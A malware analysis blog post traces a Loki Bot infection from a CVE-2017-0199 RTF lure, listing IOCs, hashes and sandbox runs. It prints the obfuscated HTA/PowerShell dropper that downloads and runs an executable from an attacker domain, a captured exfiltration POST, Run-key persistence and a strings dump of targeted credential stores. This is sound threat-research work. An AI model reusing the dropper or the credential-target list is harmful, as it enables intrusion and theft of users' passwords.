Looking for some malspam yesterday and I came across something that looks like it was exploiting the CVE 2017-0199 vulnerability in MS Office RTF files. FireEye did a nice write-up of this which you can read here. Googling to see if anyone else had seen these domains before, I was able to find that @Security Doggo had a sample back on the 14th of June for the dev[.]null[.]vg domain and that Sophos has written about the domain toopolex[.]com domain in their “Troj/Fareit-DEB” report. Running the PCAP through Network Total’s tool, I saw that it is labeling this infection as part of the Loki Bot family.
As usual, the malware and artifacts can be found over on my Github here.
Indicators of Compromise
========================
104.27.187.29 / dev[.]null[.]vg (HTTPS GET)
91.134.253.60 / toopolexlounge[.]com (HTTPS GET)
91.134.253.60 / toopolex[.]com (HTTP POST)
Artifacts
=========
File name: RFQ.doc
File size: 3.5KB
File location: NA
MD5: 9fdb7fcb522edad880317544dc1c31c4
Virustotal: http://virustotal.com/en/file/f239b0d9e4286b3e01e93c963e55fcc650ebf8f2ff183518a120029a7519c122/analysis/
Detection ratio: 25 / 56
First submission: 2017-06-12 06:57:03 UTC
Malwr: http://malwr.com/analysis/MzQxOTI2NGFkNWQ3NDA1NGJiMWYzZjM2NDZhNGIwNTQ/
Hybrid Analysis: http://www.hybrid-analysis.com/sample/f239b0d9e4286b3e01e93c963e55fcc650ebf8f2ff183518a120029a7519c122?environmentId=100
File name: RFQQ.exe / vbyu.exe
File size: 729KB
File location: NA
MD5: 40dc770b29bf8e5bd08dc35e3f8db1fa
Virustotal: http://virustotal.com/en/file/cb7d66dc1614c74879bd20bb2ae48beb3a0032231ffc75a2f1e30f0470ca56a1/analysis/
Detection ratio: 12 / 61
First submission: 2017-06-23 11:41:24 UTC
Malwr: NA
Hybrid Analysis: NA
File name: ofVYuVBj.hta
File size: 1.2KB
File location:
MD5: e6da4245d7f192c52d8faf9892b7ba59
Virustotal: http://virustotal.com/en/file/0d1a87215aca7ba079d60dd88eaea3e289eb16f1b7460734e62f9cabc8fbca1e/analysis/
Detection ratio: 13 / 57
First submission: 2017-06-23 01:00:23 UTC
Malwr: NA
Hybrid Analysis: http://www.hybrid-analysis.com/sample/0d1a87215aca7ba079d60dd88eaea3e289eb16f1b7460734e62f9cabc8fbca1e?environmentId=100
File name: 3B859C.exe
File size: 33KB
File location: C:\Users\%username%\AppData\Roaming\ABE9E3
MD5: d79f070423fdd3f01ce8c2ba3fbbc8ed
Virustotal: http://virustotal.com/en/file/97bd627ebfc4d40b21ebaaed916a1ba53859520edc99537b37d042a0d5425a5a/analysis/
Detection ratio: 0 / 61
First submission: 2011-03-12 15:50:37 UTC
Malwr: http://malwr.com/analysis/ZjA2Y2VmOTA4ZWZjNGM4OWJhM2VhMmZjMDdmZGI1NDg/
Hybrid Analysis: http://www.hybrid-analysis.com/search?query=d79f070423fdd3f01ce8c2ba3fbbc8ed
File name: 3B859C.hdb
File size: 4B
File location: C:\Users\%username%\AppData\Roaming\ABE9E3
MD5: ed93b0b941ad67dfaa8f074555378d3f
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA
File name: aot-otu
File size: 2.8MB
File location: C:\Users\%username%\AppData\Roaming\bpe
MD5: dc95e6515bd27c8cdfd56e5764d2575c
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA
File name: oki.exe
File size: 750KB
File location: C:\Users\%username%\AppData\Roaming\bpe
MD5: 71d8f6d5dc35517275bc38ebcc815f9f
Virustotal: http://virustotal.com/en/file/fb73a819b37523126c7708a1d06f3b8825fa60c926154ab2d511ba668f49dc4b/analysis/
Detection ratio: 2 / 62
First submission: 2012-01-31 01:59:40 UTC
Malwr: NA
Hybrid Analysis: http://www.hybrid-analysis.com/search?query=71d8f6d5dc35517275bc38ebcc815f9f
Analysis of Malware
===================
The interesting thing with this file is that it is really a RTF file and not a true Microsoft Word document. When you look at the file via strings, you can see the header for RTF and not a Word document. Plus, when trying to run this document through OfficeMalScanner it told me that it had detected the RTF file format and to use RTFScan. When using that tool, I got the following.
It was here that I tried one of the other tools when I am playing with Word docs or RTF files – OLETools from decalage2. Using the command ‘python rtfobj.py RFQ.doc’ I got the following with an error at the end:
found object size 2601 at index 000000B1 - end 00000DD9 saving object to file <PATH REDACTED>RFQ.doc_object_000000B1.raw ERROR *** Not an OLE 1.0 Object
I took a look at this new file via a couple of different tools (strings, and Sublime) but did not see anything much. On a gut-feeling I opened the file in a hex editor to see if there was anything that I was missing. Using the xxd command (xxd RFQ.doc_object_000000B1.raw), I saw another URL.
So we know how the initial infection starts. The RTF file reaches out to the URL of hxxps://dev[.]null.vg/ofVYuVBj[.]hta and grabs that HTA file. Looking at the HTA file I get the following code:
<!DOCTYPE html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <html> <body> <ScRIPt LaNGUAge="VBscRipt"> Window.ReSizeTo 0, 0 Window.moveTo -5574, -5808 diM lQmNAkzcRXsxTp : dIm NWBrqIyxxapExc : sET lQmNAkzcRXsxTp = createOBJEcT ( "wsCrIPt.sheLL" ) : NWBrqIyxxapExc = " POWershell.Exe -ExEcuTiOnPoLiCy bYPass -NoPrOFILe -wInDowStYLe hIDden -enCodEdCommaNd IABTAEUAdAAtAGMATwBOAHQAZQBuAHQAIAAtAFYAYQBsAFUARQAgACgAbgBlAHcALQBvAEIASgBFAEMAdAAgAFMAWQBzAHQAZQBtAC4AbgBFAFQALgBXAGUAYgBjAEwASQBlAE4AVAApAC4ARABPAHcATgBMAG8AQQBkAGQAQQBUAEEAKAAgAB0gaAB0AHQAcABzADoALwAvAHQAbwBvAHAAbwBsAGUAeABsAG8AdQBuAGcAZQAuAGMAbwBtAC8ANAA1ADUANgA2ADUANAA1AC8ANgA3ADUANgA1ADgAMwAvAEkATQBHAC8AUgBGAFEAUQAuAGUAeABlAB0gIAApACAALQBlAE4AYwBvAGQAaQBuAEcAIABiAHkAVABlACAALQBQAGEAdABoACAAHSAkAGUAbgBWADoAYQBQAHAARABhAFQAYQBcAHYAYgB5AHUALgBlAHgAZQAdICAAOwAgAHMAVABBAFIAdAAgAB0gJABFAG4AdgA6AGEAcABwAGQAYQB0AGEAXAB2AGIAeQB1AC4AZQB4AGUAHSA= " : lQmNAkzcRXsxTp.ruN CHr ( 34 ) & lQmNAkzcRXsxTp.eXPAndENvIroNMEnTSTrINGS( "%sYSTemROoT%" ) & "\SYSTEM32\WIndOWspOwerShell\v1.0\POweRsHElL.exe" & cHr ( 34 ) & chr ( 32 ) & cHR ( 34 ) & NWBrqIyxxapExc & ChR ( 34 ) , 0 : sEt lQmNAkzcRXsxTp = NOTHING </script> </body> </html>
which after the BASE64 block of text is decoded you get the following Powershell script.
<!DOCTYPE html> <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" > <html> <body> <ScRIPt LaNGUAge="VBscRipt"> Window.ReSizeTo 0, 0 Window.moveTo -5574, -5808 diM lQmNAkzcRXsxTp : dIm NWBrqIyxxapExc : sET lQmNAkzcRXsxTp = createOBJEcT ( "wsCrIPt.sheLL" ) : NWBrqIyxxapExc = " POWershell.Exe -ExEcuTiOnPoLiCy bYPass -NoPrOFILe -wInDowStYLe hIDden -enCodEdCommaNd SEt-cONtent -ValUE (new-oBJECt SYstem.nET.WebcLIeNT).DOwNLoAddATA( http://toopolexlounge.com/45566545/6756583/IMG/RFQQ.exe ) -eNcodinG byTe -Path $enV:aPpDaTa\vbyu.exe ; sTARt $Env:appdata\vbyu.exe " : lQmNAkzcRXsxTp.ruN " & lQmNAkzcRXsxTp.eXPAndENvIroNMEnTSTrINGS( "%sYSTemROoT%" ) & "\SYSTEM32\WIndOWspOwerShell\v1.0\POweRsHElL.exe" & " & ' ' & " & NWBrqIyxxapExc & " , 0 : sEt lQmNAkzcRXsxTp = NOTHING </script> </body> </html>
It looks like it potentially downloads another binary (RFQQ.exe) from the site “hxxps://toopolexlounge[.]com,” and saves it to the %APPDATA% folder and re-names it vbyu.exe.
Shifting gears to get a better idea of how this operates, I ran the RTF document in my test VM. When opening the file, I was presented with the following screen:
shortly followed by this screen:
Looking at Wireshark, the only traffic that I am able to see is when it went to the initial site ‘hxxps://dev[.]null.vg’ and managed to download the HTA file (the ofVYuVBj.hta file was in the Temporary Internet Files folder). I did not see anything in the APPDATA folder called “vbyu.exe” at that time.
So I decided to run the ofVYuVBj.hta file directly since it did not fire on my test VM. Running that file, it opened up IE and presented me with the following:
which I clicked on “Run.” Once I ran that file, I could see the MSHTA process spin up and then the Powershell process under that. I also saw that a couple of new files/folders were created on my VM, one of them being the “vbyu.exe” file. When looking at the Process Tree via Process Monitor I could easily see the relationships between parent and child processes.
Looking at Wireshark again, I could also see that the site “hxxps://toopolexlounge[.]com” had been contacted, along with some POSTs to the site “toopolex[.]com” with some details of my VM:
POST /controllers/user/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: toopolex.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BD5C680A Content-Length: 2594 Connection: close ..'.......ckav.ru......B.i.l.l.......B.I.L.L.-.P.C.......B.i.l.l.-.P.C..... ...............k.................0...B.2.7.B.D.8.5.A.B.E.9.E.3.B.8.5.9.C.6.8.A.3.1.2.....iooo9t ....H.c....ht.ps8:/....r.ack?g e..om/.<.%.,..df..l.wzi.5.!1. :..# M.ozil/a.User.P..f. n.. ../* Do...t.edi. .h_s.f\o.6.*.??I..youCmake.ch.ng.rNoJ*}zw..c .ap...c...on1=ru...`,.GB@?.w...b ovG..[.....G E..x:sN..To..1.nu.lMQ..p...,...(~v....DURL7lb..:c@..g.O/".$u.._=.("....dA..E- kU..Tim....l$-bz.gr....'N..;r"..0);.J.D..lo...B(..oHIr.G-.:g.?.G.149.3828.6.P.x..- vgfn uT.%..f'.B..b..w.h.B.4v...k.....y.]35840J3....yG..m_.Fpo2.d...9O..GZ_A.ze..l.~u...1Z.R>..SGold.$x.@s.Y.~v.rui.T......t.yC.d.2.GB..05(...C+...ACD.N.i.wN...].P.y...2...T.tO..f3..1.8.7'5-)...O4eo6E8d...&.a2..3ec..k.B.*s..JF...7-!J..Z. ..ult.o..)b.5..u.b.Ve.gza.m#.7H.....aBpVSd..ag.V|..PiUm.oz-Y.+J%..e~.P.z.T]-t) BE..../L\*[C8.ui..Bs6.+3&k.sVd..e%...(....H,.x.S.0z..X/..z==.P.a.#..{:XI.P..tv 268?}$hLs2q5.8..=.D..Gw.k..J..I...)>lI.17<w.I...x;..;v..u)0..{\...:..895W.G0...,"a.)6.t....c.&..EmD`..fp..73.2sr.z-y}...1..{47.v.(..z7...!.Q1.d0..#2j.h.5.) .0]..B....3R...C}6..K.k......*=t-b2mi..G...'...... ...C-.,V.[F.9.^..l..edA...l...#3R./..'6S !.._1V9-......8l...Zhl)dG..7.BI...vyi...@..l...%7B.2f..1#4-.6.b.w0.^..5.d.$1Uf..3;..N.D:5.4/.,c ^2>cesn6b.08...va..5.3.t.`s86D.12.`.0o&>g{...`.........A.qVV56.].e-R.DZCToB.H{..$}aU...A.)9Y.E.Z.3P .f.]Sm8.p..d..O..z...3..h.w.S.B.c.1UI..kF..".n..R.dj.f.......z.[.`S.a. C4L-.Ho.. ;.K..#,df..C....... B..E.I}D....Ro)m(!..Th.n?Tb..B.P.{'91gw.g.zx.i...C...C..R.e...v..45T.I\....d0..m..:.,F.,b.g..C....2s.K...[..m F...(x8(6)...Z.....t^...........7.}e-.y.tlR.y....,|.uEC\..&.2\:x-.yr.s.Z:.. l...9Qw..&rn.9.s.1D-3ifJ.Q..b..2^...:...!9...#9.6.nmY.-. ..5.F..4.F..4.+c[x.d..B.=&..h.U...-U...-.*va..."...^.)h...1..z.0..z<0zg.cko.bu..dID.;.UH...5..=...//6m....>45.8.....l.~.......c....Ji...^.'2..K ..f..smt.I....q2K<.t3.....ho00Z.l.e.%....p;-.u...7.2...hv.69....t.4$....ws..S.(w.xd.J..oI+Mx.J.CB......_...ghRt..NtD.1.Z..h....q...:3A..c....B...../r.@.o......=....s587./.p..h.l..^!0..!.Qbe.......::)|....H..skb+rd....pid@U821:6C.0.9v74E..`^..}-}d.b.5'.%u;d....R.aD.....8wx...F"..l|... ]D9.c-be4....f.8.7..5.....e9b3)"\.quJo...nH..E0.&.*...oR..}d7=.l...=.xg $....4N.h.....#FZ0..6m..4Im2~|.n.6q2Ol89..2..WvkJ1.3.g..g.!3DP.}.G.l5.)4kf3....6Hkkx..w.2q5KhA.....6.h.LA.r^2.n~^..ac......F,x.........tw%...n.id..sM,:..f..l....hi.fy.. .L..Z....._>e8.7H....82..+4M....0.m...T.-G......?.y.dbox.... zD..Sufh.J.=28a4......n....>a.#911.b,f0..5.._7*][..o..uF..Sq[l....Q.D1.~....B \.cdC...8..f.35....Fba0 .....7. .d.* .b. ..X..A-B< ..8.Jz6R9C.k...H5.. HTTP/1.1 404 Not Found Date: Fri, 23 Jun 2017 13:52:13 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 File not found.
Going back to look at the newly created files/folders that were created on my VM, under one of the folders called “bpe” located at “C:\Users\%username%\AppData\Roaming\” there were many different files that were written as seen below:
Switching to Process Monitor and looking for the “oki.exe” file in the log, I noticed that the “vbyu.exe” process created the various files found under the “bpe” folder. I also noticed that when the two “oki.exe” process spun up, they also called two particular files that were created by the “vbyu.exe” process as a parameter or option perhaps.
Parent PID: 2756 Command line: "C:\Users\%username%\AppData\Roaming\bpe\oki.exe" aot-otu Current directory: C:\Users\%username%\AppData\Roaming\bpe\ ----- Parent PID: 1124 Command line: C:\Users\%username%\AppData\Roaming\bpe\oki.exe C:\Users\%username%\AppData\Roaming\bpe\HYPQM Current directory: C:\Users\%username%\AppData\Roaming\bpe\
I was only able to capture the “aot-otu” file which has the following characteristics:
File name: aot-otu
File size: 2746KB
File location: C:\Users\%username%\AppData\Roaming\bpe\
MD5: DC95E6515BD27C8CDFD56E5764D2575C
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA
Looking at the strings of this file (aot-otu) showed a treasure-trove of information. Unfortunately I was not able to determine what it meant or what the code is doing. Further digging into the initial “oki.exe” process (PID 2756) and using the filter option of “CreateFile” under operation (a read operation can happen under the CreateFile operation) in Process Monitor, I can see that this process at least opened and read most, if not all the files in this directory. At this time I am not sure why.
When looking at the other “oki.exe” child process (PID 1124), and using the same “CreateFile” filter, I could see that this process is touching just three files from the “bpe” folder: 1) ssu.ico, 2) spd, and 3) HYPQM. I also noticed that the child “oki.exe” process used the “HYPQM” file to, from what I could tell, register *something* with .NET via the Regsvcs.exe utility and created two more sub-processes off of it, both being “RegSvcs.exe.”
Path: C:\Users\%username%\AppData\Roaming\bpe Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe PID: 2416 Parent PID: 348 Desired Access: Execute/Traverse, Synchronize Disposition: Open Options: Directory, Synchronous IO Non-Alert Attributes: n/a ShareMode: Read, Write AllocationSize: n/a OpenResult: Opened ----- Path: C:\Users\%username%\AppData\Roaming\bpe Command: C:\Users\%username%\AppData\Roaming\bpe\HYPQM PID: 1080 Parent PID: 348 Desired Access: Execute/Traverse, Synchronize Disposition: Open Options: Directory, Synchronous IO Non-Alert Attributes: n/a ShareMode: Read, Write AllocationSize: n/a OpenResult: Opened
The one “RegSvcs.exe” process (PID 2416) looked at many different file locations for what I am assuming are credentials and other sensitive information which is the standard MP for the Loki bot malware. It also created a registry key under the “HKCU\������Ћ�������ќ��М����������Њ���Й��я��” path with the following details:
Type: REG_EXPAND_SZ
Length: 56
Data: %APPDATA%\ABE9E3\3B859C.exe
The other “RegSvcs.exe” process (PID 1080), I believe, is the *something* that was registered with .Net since this was the process that was communicating via the POSTs found in Wireshark to the malicious site. This malware also maintains persistence via another registry setting found in “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run” with the following details: “WindowsUpdate”=”C:\Users\%username%\AppData\Roaming\bpe\oki.exe C:\Users\%username%\AppData\Roaming\bpe\aot-otu” but unfortunately I was not able to determine what process was responsible for creating that registry key.
Update 2017-06-24: Thanks to David Ledbetter (@Ledtech3 on Twitter), he was able to find the “missing” process. I am not sure how I missed this one, but the “oki.exe” process was the process that created the “WindowsUpdate” key in “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run.” Thanks David!
Update 2017-06-26: The stream that talks to the site “hxxps://toopolexlounge[.]com” mentioned above looks to have two URLs in it (ckav[.]ru and youCmake[.]ch[.]ng). When Googling around for information about this malware, I came across the link from Cysinfo that talked about the same URL as well. I ran the application “strings2” against the two “RegSvcs.exe” processes, and created logs for each of them to investigate further. As seen below, there were some hits for applications to look for and obtain credentials from, along with the domain of “hxxp://toopolex[.]com/controllers/user/fre[.]php” and the user agent as well and perhaps what is sent back to the site. There is a lot of mention around crypto as well in the one RegSvcs.exe process. I have updated the Github repo with these two strings2 output.
All of this snippet is from the pid816.log ========================================== open .tmp %s\* Windows Program Files %s\%s %s\%s\%s%s %s\%s%s UNIQUE SQLite format 3 DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW U2XpekVvtYq0fwsx7EDuZjrCo9GcF1B6Hl358mbznyLWdMANa4TSKJhIiOPgQR http:// http:// MachineGuid SOFTWARE\Microsoft\Cryptography SeDebugPrivilege ntdll.dll LdrGetProcedureAddress RtlNtStatusToDosError RtlSetLastWin32Error ZwQueryInformationProcess RtlCreateUserThread ZwAllocateVirtualMemory NtFreeVirtualMemory NtWriteVirtualMemory ZwReadVirtualMemory ZwResumeThread last_compatible_version password_value username_value origin_url logins %s\%s\User Data\Default\Login Data %s\%s\User Data\Default\Web Data %s%s\Login Data %s%s\Default\Login Data Comodo\Dragon MapleStudio\ChromePlus Google\Chrome Nichrome RockMelt Spark Chromium Titan Browser Torch Yandex\YandexBrowser Epic Privacy Browser CocCoc\Browser Vivaldi Comodo\Chromodo Superbird Coowon\Coowon Mustang Browser 360Browser\Browser CatalinaGroup\Citrio Google\Chrome SxS Orbitum Iridium \Opera\Opera Next\data \Opera Software\Opera Stable \Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer \Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer vaultcli.dll VaultEnumerateItems VaultEnumerateVaults VaultFree VaultGetItem VaultOpenVault VaultCloseVault Software\Microsoft\Internet Explorer\IntelliForms\Storage2 %s%02X file:/// Software\Microsoft\Internet Explorer\TypedURLs SELECT encryptedUsername, encryptedPassword, formSubmitURL, hostname FROM moz_logins hostname encryptedUsername encryptedPassword %s\logins.json %s\prefs.js %s\signons.sqlite signons.txt signons2.txt signons3.txt %s\Mozilla\Firefox\profiles.ini %s\Mozilla\Firefox\Profiles\%s %s\Mozilla\SeaMonkey\profiles.ini %s\Mozilla\SeaMonkey\Profiles\%s %s\Flock\Browser\profiles.ini %s\Flock\Browser\Profiles\%s %s\Thunderbird\profiles.ini %s\Thunderbird\Profiles\%s %s\K-Meleon\profiles.ini %s\K-Meleon\%s %s\Comodo\IceDragon\profiles.ini %s\Comodo\IceDragon\Profiles\%s %s\NETGATE Technologies\BlackHawk\profiles.ini %s\NETGATE Technologies\BlackHawk\Profiles\%s %s\Postbox\profiles.ini %s\Postbox\Profiles\%s %s\8pecxstudios\Cyberfox\profiles.ini %s\8pecxstudios\Cyberfox\Profiles\%s %s\Moonchild Productions\Pale Moon\profiles.ini %s\Moonchild Productions\Pale Moon\Profiles\%s %s\FossaMail\profiles.ini %s\FossaMail\Profiles\%s %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}\data Profile%i Path Profiles/ PATH %s\nss3.dll NSS_Init NSS_Shutdown PK11_GetInternalKeySlot PK11_FreeSlot PK11_Authenticate PK11SDR_Decrypt PK11_CheckUserPassword SECITEM_FreeItem sqlite3.dll mozsqlite3.dll nss3.dll sqlite3_finalize sqlite3_step sqlite3_close sqlite3_column_text sqlite3_open16 sqlite3_prepare_v2 sqlite3_prepare CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox %s\%s\Main Install Directory PathToExe SOFTWARE\Mozilla\Mozilla Thunderbird SOFTWARE\Mozilla\FossaMail SOFTWARE\Postbox\Postbox SOFTWARE\Mozilla\Flock SOFTWARE\Flock\Flock (x86) %ProgramW6432% %s\NETGATE\Black Hawk SOFTWARE\Mozilla\Pale Moon %s\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE} SOFTWARE\K-Meleon SetupPath SOFTWARE\ComodoGroup\IceDragon\Setup RootDir SOFTWARE\8pecxstudios\Cyberfox86 SOFTWARE\8pecxstudios\Cyberfox SOFTWARE\mozilla.org\SeaMonkey %s\Mozilla\Profiles SOFTWARE\Mozilla\SeaMonkey SOFTWARE\Mozilla\Waterfox ffffff firefox.exe kernel32.dll CloseHandle CreateFileW WriteFile ExitProcess Crypt32.dll CryptStringToBinaryA Shlwapi.dll StrStrA GetProcAddress LoadLibraryW %s\Opera wand.dat X!2$6*9(SKiasb+!v<.qF58_qwe~QsRTYvdeTYb form_password_control form_username_control Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete %s\QupZilla\profiles\default\browsedata.db array dict data string Server InstallDir SOFTWARE\Apple Computer, Inc.\Safari %s\Apple Computer\Preferences\keychain.plist %s\Apple Application Support\plutil.exe .xml -convert xml1 -s -o %s "%s" %s\Data\AccCfg\Accounts.tdat %s\Storage Account.rec0 %s\Foxmail\mail *.stg %SYSTEMDRIVE% Foxmail* EmailAddress Technology PopServer PopPort PopAccount PopPassword SmtpServer SmtpPort SmtpAccount SmtpPassword Software\IncrediMail\Identities UserName Passwd POP3Server POP3Port Email SMTP Email Address SMTP Server SMTP User Name SMTP User POP3 Server POP3 User Name POP3 User NNTP Email Address NNTP User Name NNTP Server IMAP Server IMAP User Name IMAP User HTTP User HTTP Server URL HTTPMail User Name HTTPMail Server POP3 Port SMTP Port IMAP Port POP3 Password2 IMAP Password2 NNTP Password2 HTTPMail Password2 SMTP Password2 POP3 Password IMAP Password NNTP Password HTTP Password SMTP Password Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook %s\32BitFtp.TMP %s\32BitFtp.ini %s\Estsoft\ALFTP\ESTdb2.dat %s\site.xml %s\BitKinex\bitkinex.ds *.tlp *.bscp LastUsedProfile Software\Bitvise\BvSshClient %s\BlazeFtp\site.dat Software\FlashPeak\BlazeFtp\Settings LastPassword LastUser LastAddress LastPort Server Password _Password Software\NCH Software\ClassicFTP\FTPAccounts settings name value %s\Cyberduck user.config %s\iterate_GmbH %s\EasyFTP\data server username protocol %s\ExpanDrive *favorites.js drives.js %s%c User HostName Software\Far\Plugins\FTP\Hosts Software\Far2\Plugins\FTP\Hosts %s\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db %s\FileZilla\Filezilla.xml %s\FileZilla\filezilla.xml %s\FileZilla\recentservers.xml %s\FileZilla\sitemanager.xml %s\FlashFXP *Sites.dat *quick.dat FtpServer FtpUserName FtpPassword _FtpPassword Software\NCH Software\Fling\Accounts %s\FreshWebmaster\FreshFTP\FtpSites.SMF %s\FTPBox\profiles.conf %s\FTPGetter\Profile\servers.xml %s\FTPGetter\servers.xml %s\FTPInfo\ServerList.xml %s\FTPInfo\ServerList.cfg %s\FTP Navigator\Ftplist.txt %s\FTP Now\sites.xml %s\FTPShell\ftpshell.fsi %s\.config\fullsync\profiles.xml %s\DeluxeFTP\sites.xml %s\GoFTP\settings\Connections.txt JaSFtp AbleFTP Automize %s\%s%i\encPwd.jsd %s\%s%i\data\settings\sshProfiles-j.jsd %s\%s%i\data\settings\ftpProfiles-j.jsd Pass Host Port Software\LinasFTP\Site Manager %s\oZone3D\MyFTP\myftp.ini %s\NetDrive\NDSites.ini %s\NetDrive2\drives.dat %s\Fastream NETFile\My FTP Links %s\NexusFile\userdata\ftpsite.ini %s\NexusFile\ftpsite.ini %s\INSoftware\NovaFTP\NovaFTP.db %s\Notepad++\plugins\config\NppFTP\NppFTP.xml %s\Odin Secure FTP Expert\QFDefault.QFQ %s\Odin Secure FTP Expert\SiteInfo.QFP PublicKeyFile TerminalType PortNumber Software\9bis.com\KiTTY\Sessions Software\SimonTatham\PuTTY\Sessions _dec %s_dec lsasrv.dll LsaICryptUnprotectData lsass.exe %s\Microsoft\Credentials Config Path Software\VanDyke\SecureFX %s\Sessions *.ini Port UserName Password %s\SftpNetDrive *.cfg %s\Sherrod Computers\sherrod FTP\favorites #document.favoriteManager* %s\SmartFTP {*.xml %s\Staff-FTP\sites.ini %s\Steed\bookmarks.txt %s\SuperPutty Sessions* sftp:// ftp:// ftps:// http:// http:// {.:CRED:.} {CREN} {CRDB} Profiles %s\Syncovery Syncovery.ini %s\wcx_ftp.ini %s\GHISLER\wcx_ftp.ini FtpIniName Software\Ghisler\Total Commander %s\UltraFXP\sites.xml %s\WinFtp Client\Favorites.dat FSProtocol Software\Martin Prikryl %s\WS_FTP\WS_FTP.INI %s\WS_FTP.INI %s\Ipswitch ws_ftp.ini %s\NetSarang\Xftp\Sessions *xfp MAC=%02X%02X%02XINSTALL=%08X%08Xk 1?0` %s\%s\%s.exe ----- User-Agent: Mozilla/4.08 (Charon; Inferno) Host: toopolex.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: BD5C680A Content-Length: 147 Connection: close Uc28-881c-1b596423337d Bill 6] < =::=::\ ALLUSERSPROFILE=C:\ProgramData APPDATA=C:\Users\Bill\AppData\Roaming CommonProgramFiles=C:\Program Files (x86)\Common Files CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files CommonProgramW6432=C:\Program Files\Common Files COMPUTERNAME=BILL-PC ComSpec=C:\Windows\system32\cmd.exe FP_NO_HOST_CHECK=NO HOMEDRIVE=C: HOMEPATH=\Users\Bill LOCALAPPDATA=C:\Users\Bill\AppData\Local LOGONSERVER=\\BILL-PC NUMBER_OF_PROCESSORS=2 OS=Windows_NT Path=C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC PROCESSOR_ARCHITECTURE=x86 PROCESSOR_ARCHITEW6432=AMD64 PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=3d04 ProgramData=C:\ProgramData ProgramFiles=C:\Program Files (x86) ProgramFiles(x86)=C:\Program Files (x86) ProgramW6432=C:\Program Files PSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ PUBLIC=C:\Users\Public SESSIONNAME=Console SystemDrive=C: SystemRoot=C:\Windows TEMP=C:\Users\Bill\AppData\Local\Temp TMP=C:\Users\Bill\AppData\Local\Temp USERDOMAIN=Bill-PC USERNAME=Bill USERPROFILE=C:\Users\Bill windir=C:\Windows windows_tracing_flags=3 windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.log VTBin\Tests\installpackage\csilogfile.log 200 OK Date: Mon, 26 Jun 2017 07:39:45 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8